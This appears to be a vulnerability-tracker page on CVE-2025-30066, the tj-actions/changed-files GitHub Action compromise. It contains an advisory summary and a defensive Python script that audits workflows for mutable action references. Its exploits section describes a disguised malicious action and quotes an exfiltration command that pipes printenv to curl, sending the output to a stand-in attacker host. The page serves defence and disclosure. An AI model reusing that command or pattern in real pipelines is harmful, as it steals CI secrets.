Embedded malicious code in tj-actions/changed-files
CVE-2025-30066 is a supply-chain compromise of the GitHub Action tj-actions/changed-files. On 2025-03-14 and 2025-03-15 the release tags v1 through v45.0.7 were retroactively repointed to the attacker-controlled commit 0e58ed8, which carried malicious updateFeatures code. Any workflow that resolved one of those tags ran the injected code, which wrote secrets available to the runner into the workflow log, so anyone able to read those logs could recover the values. The compromise is reported to have been enabled by a compromised GitHub Personal Access Token and possibly by an upstream, cascading compromise of reviewdog/action-setup@v1. Exposure was limited to repositories that referenced the action by mutable tag; references pinned to a full, unmodified commit SHA were not affected.
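As an added example (this is not code from the advisory, from tj-actions, or from this page), the following Python script scans workflow text for `uses:` references and flags the patterns that made repositories exposed: a tag or branch instead of a full commit SHA, the repointed tag range v1 to v45.0.7 for tj-actions/changed-files, and a direct reference to the malicious commit 0e58ed8. The sample workflow, the action names other than tj-actions/changed-files and reviewdog/action-setup, and the placeholder SHA are constructed for the example. The regex-based parsing assumes each `uses:` entry sits on its own line, which is how GitHub's workflow syntax is normally written but is not guaranteed for arbitrary YAML.

```python
"""Flag mutable action references in GitHub Actions workflows.

Added example, not code from the advisory or from tj-actions. It extracts
every `uses:` entry from workflow text and reports references that are not
pinned to a full 40-hex commit SHA. The sample workflow below is constructed.
"""
import re

# A reference is immutable only when it is a full commit SHA.
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Matches `uses: owner/repo@ref`, with or without a leading list dash or quotes.
# Assumption: `uses:` sits on its own line, as in GitHub's workflow syntax.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)", re.MULTILINE)

# Per the advisory: tags v1 .. v45.0.7 were repointed to commit 0e58ed8.
REPOINTED_ACTION = "tj-actions/changed-files"
REPOINTED_MAX = (45, 0, 7)
MALICIOUS_COMMIT_PREFIX = "0e58ed8"  # short form quoted in the advisory


def parse_version(tag):
    """Turn 'v45', 'v45.0' or 'v45.0.7' into a comparable tuple; None otherwise."""
    m = re.fullmatch(r"v?(\d+)(?:\.(\d+))?(?:\.(\d+))?", tag)
    if not m:
        return None
    return tuple(int(part) if part else 0 for part in m.groups())


def is_pinned(ref):
    """True only for a full 40-character hex commit SHA."""
    return bool(FULL_SHA_RE.match(ref))


def audit_uses(workflow_text):
    """Return [(uses_spec, reason)] for every reference that should not be trusted."""
    findings = []
    for m in USES_RE.finditer(workflow_text):
        spec = m.group(1)
        if spec.startswith("./") or spec.startswith("docker://"):
            continue  # local actions and container images carry no git ref to pin
        if "@" not in spec:
            findings.append((spec, "no ref given; resolves to the default branch"))
            continue
        name, ref = spec.rsplit("@", 1)
        version = parse_version(ref)
        if ref.startswith(MALICIOUS_COMMIT_PREFIX):
            # Prefix match on purpose: the page quotes the short SHA only.
            findings.append((spec, "references the malicious commit 0e58ed8 (CVE-2025-30066)"))
        elif is_pinned(ref):
            continue
        elif name == REPOINTED_ACTION and version is not None and version <= REPOINTED_MAX:
            findings.append((spec, "tag in the repointed range v1..v45.0.7 (CVE-2025-30066)"))
        else:
            findings.append((spec, f"mutable ref '{ref}'; pin to a full commit SHA"))
    return findings


# Constructed sample, not any real repository's workflow; the checkout SHA is a placeholder.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: tj-actions/changed-files@v45
        id: changed
      - uses: reviewdog/action-setup@v1
      - uses: ./.github/actions/local-build
      - uses: example-org/example-action
"""

if __name__ == "__main__":
    for spec, reason in audit_uses(SAMPLE_WORKFLOW):
        print(f"{spec}: {reason}")
```

Run it over the concatenated contents of `.github/workflows/*.yml`; anything reported should be repinned to a SHA you have verified against the upstream repository, since a pin to the attacker's commit is no safer than the tag that pointed at it.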
Exploits
1 exploit repository listed after filtering out fakes, detection scripts, and README-only repos (1 further entry hidden).
This repository is a small malicious GitHub Action disguised as a benign cache utility. It contains three files: a minimal README describing it as a simulated compromised action for security research, an action.yml manifest defining a Node 20 action named 'Cache Files', and dist/index.js with the actual logic. The JavaScript implements a lightweight mock of the @actions/core helpers, accepts path and key inputs, and emits plausible cache-related outputs so that the action looks legitimate. Before the normal run() logic, however, it executes two obfuscated payload stages via eval: one decoded from a hex string and a second decoded from a base64 string. The second stage imports child_process.execSync and runs 'printenv | curl -X POST -d @- https://attacker.example.com/envs', sending every environment variable on the runner to an attacker-controlled endpoint. This is the CI/CD supply-chain pattern the README describes as a simulation of CVE-2025-30066-style behaviour. The capability is credential and secret theft from the CI environment, not host takeover, and because the action preserves its expected behaviour and ships a working exfiltration command rather than a placeholder, it is operational rather than a bare proof of concept. One caveat when reasoning about blast radius: printenv only captures secrets the workflow has already materialised as environment variables (for example through env: or with: mappings), whereas the original incident is reported to have pulled secrets from runner process memory.
Recent activity
18 sources tracked across advisories, community write-ups, and news.
A supply-chain vulnerability/incident involving tj-actions in which retroactive tag modification attacks could be used against CI/CD workflows; cited here as a reason to pin actions to immutable SHAs.
A supply-chain compromise affecting tj-actions/changed-files through a poisoned transitive GitHub Action dependency chain, resulting in malicious code execution on CI runners and secret theft from memory.
A vulnerability in the tj-actions/changed-files GitHub Action that caused repositories to leak secrets, cited as another example of supply-chain compromise risk.
A vulnerability arising from the compromise of the GitHub Action tj-actions/changed-files, enabling malicious code injection and remote impact (e.g., secrets exposure).